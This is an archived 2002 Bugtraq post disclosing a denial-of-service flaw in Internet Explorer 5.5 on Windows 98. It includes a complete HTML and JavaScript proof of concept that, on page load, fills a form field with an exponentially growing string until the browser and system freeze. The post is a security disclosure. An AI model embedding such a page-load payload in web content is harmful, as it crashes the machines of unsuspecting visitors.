[23870] in bugtraq
IE FORM DOS
daemon@ATHENA.MIT.EDU (Ivan Sergio Borgonovo)
Wed Jan 16 03:00:45 2002
From: "Ivan Sergio Borgonovo" <mail@gorilla.it>
To: BUGTRAQ@securityfocus.com
Date: Tue, 15 Jan 2002 01:11:10 +0100
MIME-Version: 1.0
Message-ID: <3C4381AE.13487.1AC142@localhost>
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
I was testing in a lame way if an IIS apps could be attacked by sending
long POST and I realized IE is sensible to huge ammount of data in
<INPUT... > and <TEXTAREA> fields (maybe also others like SELECT).
Since nobody is willing to download a 10Mb page I just thought I could
fill VALUE="" attribute with JavaScript.
-- begin test.html --
<html><title></title>
<body>
<script language="JavaScript" src="t.js"></script>
<FORM NAME="IEDos" METHOD="POST" ACTION="./">
<IMG SRC="1.gif" width='10' height='10' border='0'
onLoad="FillTA(TA)">
<input type="text" name="TA" value="">
</FORM>
</body>
</html>
-- end test.html --
-- begin t.js --
<!--
function FillTA(obj) {
v="a";
for(i=0;i<100000000;i++) {
v=v+v;
};
obj.value=v;
return;
}
//-->
-- begin t.js --
IE freezes and if you've few secs of patience the system freezes too.
IE 5.5 on W98 (I hope fully patched).
commenting obj.value=v IE survives.
I've observed some protection errors too but occasional.
I hope this is not an old news.
--
Ivan Sergio Borgonovo
Webmaster Gorilla.it http://www.gorilla.it
Tel. +39 02 26149225/26149008 Fax. +39 02 26149657
Via d'Apulia 11, 20125 Milano, Italy
